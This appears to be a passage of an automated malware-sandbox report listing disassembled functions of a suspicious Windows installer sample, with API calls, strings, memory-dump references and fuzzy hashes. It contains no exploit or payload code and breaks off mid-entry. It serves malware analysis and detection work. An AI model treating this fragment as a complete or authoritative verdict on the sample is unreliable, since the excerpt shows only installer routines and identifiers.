Instruction ID: 217fbe9c53fcac7a38d38ba6b36a95d3c52d9e466bb1b0d29fe77156d884dce9
Opcode Fuzzy Hash: 60ed21fe2f328070877fcf4fb1291f079d9e461e65f212612ce38389da6d49e8
Instruction Fuzzy Hash: 01A161F1A00205ABDB11EFA5C985AAF77B8EF84315F10803BF611B62D1D77C9A418B6D

Function 00402104 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(004084E4,?,?,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183

Strings

C:\Users\user\AppData\Local\Iw\Unnumberable, xrefs: 004021C3

Memory Dump Source

Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Local\Iw\Unnumberable
API String ID: 542301482-3164773890
Opcode ID: 4630f11a642d4e3ef4f98d2454dc0e8d663bfbe8c95ddff176ede1b1d5b4d77b
Instruction ID: a370b0fa9b2e606d6813e98b4c017b265e4ea8c47d708310f479c561ceb58c7b
Opcode Fuzzy Hash: 4630f11a642d4e3ef4f98d2454dc0e8d663bfbe8c95ddff176ede1b1d5b4d77b
Instruction Fuzzy Hash: 80414A71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E1DBB99981CB54

Function 00402868 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402877

Memory Dump Source

Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 6fd2962910cdf18594a7907c322fc030c9e7a26b232b9d9b5d327205302d7dac
Instruction ID: e6f127318fd58302517648c6e406f49d0db104963aa8d987e753e5cb7f87edca
Opcode Fuzzy Hash: 6fd2962910cdf18594a7907c322fc030c9e7a26b232b9d9b5d327205302d7dac
Instruction Fuzzy Hash: EDF08271A14104EBDB10DBA4DA499AEB378EF14314F60467BF545F21E0DBB45D809B2A

Function 0040451E Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,?), ref: 004045BC
GetDlgItem.USER32(?,000003E8), ref: 004045D0
SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 004045ED
GetSysColor.USER32(?), ref: 004045FE
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040460C
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040461A
lstrlenW.KERNEL32(?), ref: 0040461F
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040462C
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404641
GetDlgItem.USER32(?,0000040A), ref: 0040469A
SendMessageW.USER32(00000000), ref: 004046A1
GetDlgItem.USER32(?,000003E8), ref: 004046CC
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040470F
LoadCursorW.USER32(00000000,00007F02), ref: 0040471D
SetCursor.USER32(00000000), ref: 00404720
LoadCursorW.USER32(00000000,00007F00), ref: 00404739
SetCursor.USER32(00000000), ref: 0040473C
SendMessageW.USER32(00000111,?,00000000), ref: 0040476B
SendMessageW.USER32(00000010,00000000,00000000), ref: 0040477D

Strings

Call, xrefs: 004046FB
N, xrefs: 004046BA

Memory Dump Source

Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: Call$N
API String ID: 3103080414-3438112850
Opcode ID: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
Instruction ID: 26ae409e5f73424340e4bb55f347a499eb46e427c8d4328441e026d38e95c6c2
Opcode Fuzzy Hash: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
Instruction Fuzzy Hash: 4B6173B1900209BFDB109F60DD85EAA7B69FB84314F00853AFB05772E0D7789D52CB58

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,?), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
Instruction ID: b35030fe9107d9a8359b932f7918d2348922827c9ca57aaae851fe5b21190c6b
Opcode Fuzzy Hash: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
Instruction Fuzzy Hash: 92418A71800249AFCF058FA5DE459AFBBB9FF44310F00842AF991AA1A0C738E955DFA4

Function 00406034 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,?,004061CF,?,?), ref: 0040606F
GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00406078

Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85

GetShortPathNameW.KERNEL32(?,004275C8,00000400), ref: 00406095
wsprintfA.USER32 ref: 004060B3
GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 004060EE
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060FD
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406135
SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 0040618B
GlobalFree.KERNEL32(00000000), ref: 0040619C
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061A3

Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\WGi85dsMNp.exe,80000000,00000003), ref: 00405EE2
Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405F04

Strings

[Rename], xrefs: 0040611D, 0040612F
%ls=%ls, xrefs: 004060A9

Memory Dump Source

Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: a8f6130d4aa3065939d725957225dfc1b425243e5004b20d0867480790577512
Instruction ID: 8c4bc4cab4d3408e43c29de3b383fd3cef376d344e04ab2aaf2f470794b42cbb
Opcode Fuzzy Hash: a8f6130d4aa3065939d725957225dfc1b425243e5004b20d0867480790577512
Instruction Fuzzy Hash: 34313770200719BFD2206B619D48F6B3A6CEF45704F16043EFA46FA2D3DA3C99158ABD

Function 004043C6 Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 004043E3
GetSysColor.USER32(00000000), ref: 00404421
SetTextColor.GDI32(?,00000000), ref: 0040442D
SetBkMode.GDI32(?,?), ref: 00404439
GetSysColor.USER32(?), ref: 0040444C
SetBkColor.GDI32(?,?), ref: 0040445C
DeleteObject.GDI32(?), ref: 00404476
CreateBrushIndirect.GDI32(?), ref: 00404480

Memory Dump Source

Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
Instruction ID: 4d8d1a64c5805e8a020b3744e793f2033a9a6b6b0a681029562fed9dd316a9da
Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
Instruction Fuzzy Hash: 722131715007049BCB319F68D948B5BBBF8AF81714B148A2EEE96E26E0D738D944CB54

Function 00405450 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B

Memory Dump Source

Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: d8bd542d8f5d0add287beae510a16995646733a1dc03fc5179ed0d48c47eb8dc
Instruction ID: e73fa1987b6059f35b704de59c80f6892b54c3d1ee51518932a2041d94d0b0cb
Opcode Fuzzy Hash: d8bd542d8f5d0add287beae510a16995646733a1dc03fc5179ed0d48c47eb8dc
Instruction Fuzzy Hash: BE21A171900558BACB119F95DD84ACFBFB5EF84314F10803AF904B22A1C3798A91CFA8

Function 0040667C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,75923420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,75923420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,75923420,004036EF,?,00000006,00000008,0000000A), ref: 00406706

Strings

*?|<>/":, xrefs: 004066CE
C:\Users\user\AppData\Local\Temp\, xrefs: 0040667D, 00406682

Memory Dump Source

Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-1201062745
Opcode ID: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
Instruction ID: ccb021e8c97aa0e4e9f296cc8cc4b0d2e06c32826977e33acd3911ee1a404cd3
Opcode Fuzzy Hash: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
Instruction Fuzzy Hash: E011C82580061295DB302B548C44B77A2E8EF55764F52843FE985B32C1EB7D5CE28ABD

Function 00402E8E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000), ref: 00402EA9
GetTickCount.KERNEL32 ref: 00402EC7
wsprintfW.USER32 ref: 00402EF5

Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B

CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402F19
ShowWindow.USER32(00000000,00000005), ref: 00402F27

Part of subcall function 00402E72: MulDiv.KERNEL32(00017969,00000064,00017ED2), ref: 00402E87

Strings

... %d%%, xrefs: 00402EEF

Memory Dump Source

Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
Instruction ID: c65c9f61eb329069142d3a49436c3393aeffd9891ae55f37d91fa0e4ac25720a
Opcode Fuzzy Hash: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
Instruction Fuzzy Hash: 1A016170941614EBC7226B60EE4DA9B7B68BB01745B50413FF841F12E0CAB84459DBEE

Function 00404D1A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D35
GetMessagePos.USER32 ref: 00404D3D
ScreenToClient.USER32(?,?), ref: 00404D57
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D69
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D8F

Strings

f, xrefs: 00404D6B

Memory Dump Source

Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
Instruction ID: ac2b37e4453cd55ff3643614bd1240a9a451636028a825994647dd398b99f398
Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
Instruction Fuzzy Hash: 23015E71940218BADB00DB94DD85FFEBBBCAF95711F10412BBA50F62D0D7B499018BA4

Function 00402DF3 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,?,000000FA,00000000), ref: 00402E11
wsprintfW.USER32 ref: 00402E45
SetWindowTextW.USER32(?,?), ref: 00402E55
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E67

Strings

verifying installer: %d%%, xrefs: 00402E3A
unpacking data: %d%%, xrefs: 00402E33, 00402E43

Memory Dump Source

Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
Instruction ID: 1bfa7b94c56a1c823be81e007cf4dd9dcc28a4463181553f30e61efe61dd31fb
Opcode Fuzzy Hash: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
Instruction Fuzzy Hash: 30F0317064020CABDF206F60DD4ABEE3B69EB40319F00803AFA45B51D0DBB999598F99

Function 6F942569 Relevance: 9.1, APIs: 6, Instructions: 109COMMON

Download Yara Rule

APIs

Part of subcall function 6F94121B: GlobalAlloc.KERNEL32(00000040,?,6F94123B,?,6F9412DF,00000019,6F9411BE,-000000A0), ref: 6F941225

GlobalFree.KERNEL32(?), ref: 6F942657
GlobalFree.KERNEL32(00000000), ref: 6F94268C

Memory Dump Source

Source File: 00000000.00000002.2212754583.000000006F941000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F940000, based on PE: true

Associated: 00000000.00000002.2212735857.000000006F940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2212770534.000000006F944000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2212826501.000000006F946000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f940000_WGi85dsMNp.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: c3d0c9bd4fd0d3467daf234b85dec31dcf1e94502136da98e910c887a3c1166d
Instruction ID: bb55c8e11ae62a3454f6565a5c6cbeb56c54cc1c839ff097b360dac0b51605c6
Opcode Fuzzy Hash: c3d0c9bd4fd0d3467daf234b85dec31dcf1e94502136da98e910c887a3c1166d
Instruction Fuzzy Hash: D631BC31908601DFDB259FA8D994C2A7BBAFBB7314310466AF541C72E0C731E869CF65

Function 004028AD Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
GlobalFree.KERNEL32(?), ref: 00402956
GlobalFree.KERNEL32(00000000), ref: 00402969
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995

Memory Dump Source

Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: ad54be54d1b33f2c3e643305ac3600c2e6c22dcacd93b56e136af0bf18fa41fc
Instruction ID: fa73a2a76dd28b4b8719808dd60f9f08d060129827b0ffc87b4efdc8f5ae5e12
Opcode Fuzzy Hash: ad54be54d1b33f2c3e643305ac3600c2e6c22dcacd93b56e136af0bf18fa41fc
Instruction Fuzzy Hash: 3D21BFB1D00124BBCF116FA5DE48D9E7E79EF09364F10023AF9607A2E1CB794D418B98

Function 00404C0C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
wsprintfW.USER32 ref: 00404CB6
SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9

Strings

%u.%u%s%s, xrefs: 00404C97
(7B, xrefs: 00404C9F

Memory Dump Source

